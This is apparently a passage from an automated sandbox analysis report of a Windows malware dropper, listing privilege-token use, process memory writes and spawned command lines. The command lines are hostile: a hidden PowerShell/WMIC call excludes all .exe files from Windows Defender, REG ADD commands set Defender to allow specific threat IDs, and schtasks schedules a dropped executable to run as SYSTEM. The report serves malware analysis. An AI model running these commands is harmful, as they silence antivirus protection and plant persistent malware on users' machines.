N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\zxEzzCo.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1116 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe
PID 1116 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe
PID 1116 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe
PID 3208 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3208 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3208 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4624 wrote to memory of 2136 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4624 wrote to memory of 2136 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4624 wrote to memory of 2136 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2136 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 544 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 544 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 544 wrote to memory of 2468 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3208 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3208 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3208 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4456 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4456 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4456 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 2512 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3052 wrote to memory of 2512 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3052 wrote to memory of 2512 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2512 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2512 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2512 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 3712 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 4768 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 4768 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 4768 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 3204 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 3204 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 3204 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 2168 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 2168 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 2168 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 1612 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 1612 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 1612 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 3528 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 3528 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 3528 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 2024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 2024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 2024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 4168 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 4168 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 4168 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 2476 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 2476 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 2476 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 1212 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 1212 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 1212 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 4452 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 4452 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 4452 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 1372 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 1372 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 1372 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3052 wrote to memory of 2144 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe

"C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe"

C:\Users\Admin\AppData\Local\Temp\7zS3DF3.tmp\Install.exe

.\Install.exe /PdidDDD "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bEcIFlOHxifjjBuFoU" /SC once /ST 17:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe\" 1V /LPsite_idWmK 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe

C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\vAelVis.exe 1V /LPsite_idWmK 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

